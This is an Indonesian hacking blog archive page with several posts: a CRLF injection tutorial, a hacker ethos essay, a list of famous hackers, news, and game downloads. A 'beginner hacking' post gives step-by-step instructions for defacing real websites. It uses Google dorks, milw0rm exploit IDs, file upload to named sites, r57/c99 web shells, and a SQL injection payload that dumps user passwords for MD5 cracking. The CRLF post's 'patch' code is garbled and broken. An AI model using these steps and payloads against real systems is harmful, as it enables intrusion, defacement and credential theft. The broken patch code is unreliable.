shoutbox

Share Link

http://yusuf-facrony.uni.cc Mari saling tukar menukar link.. silahkan copy kode diatas, saya juga akan link balik anda, thanks
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Sabtu, 22 Januari 2011

postheadericon Tutorial CRLF

CRLF INJECTION ATTACK
atau biasa juga di sebut sebagai HTTP response splitting
yaitu serangan web yang memanipulasi sanatization php code yg memang sengaja
di injeksi ama user.
biasanya si attacker memanfaatkan kelemahan aplikasi web untuk melakukan
berbagai macam serangan kek XSS,cross user defacement,bahkan positionin cache web klien.

MEKANISME CRLF INJECTION

CRLF (CARRIAGE RETURN and LINE FEED) menggunakan kedua karakter khusus yang mewakili
End Of Line (EOL) sebagai penanda untuk protokol internet,tapi kagak terbatas
pada MIME (e-mail,NNTP (newsgroup) dan yang lebih penting HTTP.

CONTOH SERANGAN :

misalkan kita mengelola site yang ada bug CRLF si attacker ini bakal ngirim email
ke salah satu site admin kita yang berisi link CRLF-crafted,link ini seh

Code:
http://www.surabayahackerlink.org/news.php?page =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html

tampaknya baek-baek ajah,tapi pas kita klik dan ke--redirect
ke site kita link nya
bakal nampil kek gini :

[code]http://surabayahackerlink:2082/frontend/x3/index.html?post_login =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html

[Image: contoh.jpg]

HACKED SOMEONE

serangan ini seh cuma munculin kata-kata pada mesin korbang
tapi bahaynya adalah bahwa server kita menghasilkan kode HTML,sehingga
si attacker bakal lebih gampan inject html code ke browser web kita
akibatnya serangan ini bisa menyebabkan poisoning of cache pada web client,cookie,XSS
entah perusakan permanen ato sementara pada halaman web kita [ hoyoh,lagi-lagi kita prustasi ]
bahkan pencurian informasi pada database!!!

balik ke link tsb,misal kita melihat yang ini :

Code:
http://www.surabayahackerlink.org/news.php?page =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html

mungkin beberapa pars code
Quote:"event 0a% pattern% oD"
pattern ini adalah setara dengan pengiriman request http crlf dan merupakan
alasan mengapa kita sebut teknik ini sebuah CRLF injection [ tuh,kan hm kita lagi-kita lagi,lagi-lagi kita]


PENCEGAHAN :

sebenrnya seh,cara pencegahannya tuh gampang-gampang susah,gk beda kl kita ngupil pake jari
telunjuk kaki kiri Tongue cuma membersihkan URL yg mengarah ke halaman web di situs kita yang
berisi kode server return line.pentest wat cari bug ini sangat susah (menurut ane)
karena aplikasi web yang paling banyak digunakan saat ini adalah
sisi-server redirect.sehingga lokasi kerentanan ini tidak selalu jelas.
[*tapi jangan salah buktinya forum ane yg ane pentest juga kena bug ini :( ]
serangan dan vulnerabilitas laennya,bisa digunakan memeriksa kekuatan password
pada halaman otentikasi dan secara otomatis audit shopping cart,form,dynamic content dan
applikasi web laennya.

PATCH :
walopun serem,tapi patchnya kagak sesulit ngupil
pake jari telunjuk kaki kiri,VULNERABILITAS CRLF sangat mudah untuk patch.
Contoh kode berikut mengasumsikan input yang setting ke
$['input']_POST

Code:
if (eregi('n',['input']$_POST)); // ini memeriksa untuk karakter baris baru pada variabel POST
{// Start if ..
die ("CRLF Attack Terdeteksi"); // program keluar jika CRLF ditemukan dalam variabel
} // End if ..

ane dapetin bug ini karena pake w3af.
credit schumbag devilzc0de
Sabtu, 28 Agustus 2010

postheadericon Hacker’s Black Book

Hacker’s Black Book

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDQ206bn26jnthcJRNEg9lg8iGNsZ-fPmjJog_rP0TbAeMqKkvuAYpQid1GAypTbgK2ZvTss0ARHSKFb7MpzKwnNCG7PAzXnVxYqnCLc68jT9H0Dnba_XZ5DZ16lzJykDojvm2kI6kjiCb/s400/wio55l.jpg

Product Details

  • Paperback: 139 pages
  • Publisher: Ingo Haese publishing (April 2003)
  • ISBN-10: 3935494025
  • ISBN-13: 978-3935494021
Review
After reading through the hackers blackbook i was able to plug a few holes and heighten our security even more. — John Tenjack (Kansas), reader, May 31, 2002

The book gives a very good overview of what kind of attacks users are subject when connected to the net. — Hugo Rodrigues (UK), reader, June 8, 2002

WITH THE BOOK I WAS ABLE TO “HACK” MY OWN SYSTEMS AND I LEARNED HOW TO PROTECT THEM. — ALBANO (New York), reader, June 4, 2002

Product Description
This unique report gives a perfect overview, what hackers are able to, how they act and how to protect a system. It’s easy to read (not heavy to read like all other books around hacking) and fascinating.More than 200,000 peoples in all over the world (USA and Germany) already read this report. Now they act more carefully in the internet. PLUS: The book contains a login and password to an online readers area with tools, articles and a special hacking and security search engine.

download: http://rapidshare.com/files/50308182/Hackers.Black.Book.pdf

Minggu, 19 Juli 2009

postheadericon Hacker


Apa Itu Hacker ??

Segelintir orang mungkih masih beranggapan bahwa hacker adalah orang yg suka merusak,merugikan,pembawa sial,gak punya aturan,dan hal² negatif lainnya.Tapi tahu kah anda arti Hacker yg sesungguh nya? apa saja hal yg di kerjakannya ? dari mana dia berasal ? dan apa saja inti dari pekerjaanya.Saya hanya ingin menjelaskan sedikit pengertian hacker dan aturan main yg saya ketahui dari berbagai nara sumber,termasuk dari teman² saya di forum.

Hacker julukan untuk orang yang penasaran bila dikatakan tidak ada celah diprogram kami, karena hacker tidak pernah percaya ada program yang sempurna.

  • dapat melihat yang tidak bisa dilihat oleh admin,
  • mengingatkan admin, bila terjadi celah pada system nya
  • bukan lah pencuri (carder), perusak, atau penghancur.
  • mempunyai kode etik
  • berkembang seiring berkembangnya teknologi
  • tidak ingin merasa hebat,
  • tak pernah mudah menyerah untuk mencoba, karena pekerjaan kami jauh melampaui manusia biasa
  • mencari informasi.
  • sama dengan user, kami bayar bila main diwarnet, kami bermain internet (browsing, chatting, dll) Very Happy
  • menjunjung solidaritas tinggi ilmu pengetahuan
  • senang bermain-main dengan program
Penjelasan hacker:
  • hitam sebab kami senang mempunyai ciri khas hitam,
  • underground kami dianggap kaum bawah, karena kami tidak ingin dianggap hebat
  • negatif kami senang melewati pintu belakang(backdoor)
  • perusak kami bukan perusak, kami hanya memberitahukan admin
  • musuh peradapan teknologi: karena kami maka ada perkembangan teknologi, tidak ada noda ya tidak belajar
  • musuh kami bukan musuh yang harus dibasmi, karena kami orang hebat, dunia maya kami the winner, system kami yang the champion ,, kami sama dengan kalian, kami punya aturan, kami punya etika, kami punya hatinurani, dimana kesalah kami?
Dapat kita lihat semua kesimpulan di atas bahwa banyak perbedaan antara HACKER dan CRACKER.Tapi sebenarnya kemampuan mereka untuk mengakses komputer tidak beda jauh.Biasanya para Hacker ini lebih senang berbagi informasi,lain dengan Cracker yang suka menyimpan ilmu mereka untuk personal.

sumber: www.forum.hackers-center.com

kumpulan Video Hacking

script buat hack friendster
all video Hacking

Video newhack[dot]org ada 2 Video klik di bawaH
moHon liHat nama filenya untuk menonton confert dulu kalo tidak suport

source from: http://www.kusanag1.co.cc
Jumat, 10 Juli 2009

postheadericon Komputer FBI & Kepolisan AS Diserang Virus Misterius


WASHINGTON - FBI dan Kepolisaan AS langsung mematikan jaringan komputer mereka, sebagai upaya pencegahan terhadap serangan peretas. Pasalnya, sistem mereka di unit pelayanan hukum telah disusupi virus misterius.

Pihak kepolisian Amerika itu mengatakan, mereka telah memutuskan jaringan komputer di layanan hukum, sebagai upaya untuk menangkal virus komputer yang belum teridentifikasi itu menjalar ke tempat mereka. Demikian juga dengan FBI, yang melakukan hal yang serupa.

"Kami telah mengevaluasi sistem jaringan eksternal. Pencegahan dini perlu segera dilakukan," kata juru bicara FBI Mike Kortan, seperti yang dikutip Yahoo News, Jumat (22/5/2009).

"Kami memutuskan jaringan kami sementara waktu dan jaringan Departemen Kehakiman juga melakukan hal yang sama untuk mencegah meluasnya dampak virus tersebut," tambah juru bicara kepolisaan AS.

Mike Kortan juga mengatakan, kalau sebelumnya komputer di FBI sedang mengalami masalah. Namun sayang, tidak disebutkan masalah apa yang dimaksud itu berupa virus yang dimaksud. FBI sendiri ketar-ketir, mengingat sebuah sumber menyebutkan, kalau peretas China sedang berusaha membobol data penting mereka. (srn)
okezone.com
Senin, 22 Juni 2009

postheadericon Most 5 black hacker

Beberapa nama 5 mantan black hat hacker in the world

1. JONATHAN JAMES
James adalah orang Amerika, saat baru beumur 16 tahun dia di kirim ke penjara karena kelakuannya di dunia maya. Situs departemen pertahanan Amerika dibobol oleh James dan James hanya mengatakan hal itu adalah tantangan baginya dan merupakan suatu kesenangan tersendiri.
NASA pun sempat menjadi target keisengan James, James mencuri software NASA yang diperkirakan seharga $1,7 Juta Dollar AS, sampai - sampai NASA dipaksa untuk mematikan server dan sistemnya. Karena kelakuannya itu James tidak boleh memegang komputer selama 10 tahun. Akan tetapi sekarang James sudah berada di jalan yang benar dan membuat sebuah perusahaan keamanan di bidang komputer

2. ADRIAN LAMO
Adrian Lamo membobol New York Times untuk mendapatkan info personal dan beberapa security number dan membobol Microsoft. Akhirnya Adrian Lamo didenda $65.000 dollar US. Akan tetapi saat ini Adrian Lamo sudah berjalan di jalan yang semestinya. Adrian Lamo saat ini menjadi pembicara di beberapa acara seminar.

3. KEVIN MITNICK

Ini adalah beberapa sepak terjang Kevin Mitnick

  • Menggunakan Los Angeles Bus Transfer System untuk mendapatkan tumpangan gratis.
  • Mengelabui FBI
  • Hacking ke dalam DEC System ( Digital Equipment Corporation )
  • Mendapatkan Administrator position dalam satu komputer IBM agar menang judi.
  • Hacking Motorola, Nec, Nokia, Sun Microsystems dan Fujitsu Siemens Systems
  • Dan masih banyak lagi . . .

Seorang white hat hacker bernama Tsutomu Shimomura ( Tsutomu merupakan top 5 white hat hacker ) di hack komputer systemnya, dan terjadilah perang luar biasa. Kevin Mitnick terlacak dan tertangkap oleh FBI dengan bantuan Tsutomu Shimomura yang melacak ( tracking ) lewat jaringan HP yang dibawa oleh Mitnick saat itu. Akan tetapi Mitnick sekarang sudah menjadi penulis buku, konsultan security dan pembicara berbagai seminar.


4. KEVIN POULSEN
Juga dikenal dengan Dark Dante, Dark Dante mengehack database FBI. Selain itu Dante juga mengehack seluruh lines phone station. Karena memang kemahiran dia adalah mengehack lewat phone lines. Saat ini Dark Dante menjadi senior di Wired News dan berhasil menangkap 744 penawaran sex melalui profile MySpace.



5. ROBERT TAPPAN MORIS
Robert Tappan Moris adalah orang yang pertama kali membuat Worm, yang dinamai Morris Worm. Melalui Internet dia menyebar wormnya yang mengakibatkan sekitar 6000 komputer menjadi down. Akhirnya Robert dipenjarakan rumah selama 3 tahun dan didenda $10.500 dollars. Sekarang Robert bekerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory.

sumber: supralova.comli.com
Rabu, 29 April 2009

postheadericon Tutor Hacking Buat Pemula


Ok, di posting saya kali ini, saya akan mengulas bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,

pertama2 buka milw0rm,


Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.

1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di cuba
misalnya neh :
Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi

3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi

4. Setelah itu muncul upload files

5. Lu bikin html yang bagus terus upload dah...


Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
Code:
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276

selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)

3. Selamat mencoba !

SQL Injection
--------------

Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.

2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :

Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*


3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php

4. Selamat Mencuba

NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami, this is just for education..
Selasa, 28 April 2009

postheadericon Hack the game


Game ini juga adalah sebuah game simulasi hacker

Size : 1.02MB

Download

postheadericon Uplink: Hacker Elite


Game ini untuk melatih para hacker. Saya sendiri juga memakainya. selamat mencoba..


Size : 28.62MB


Download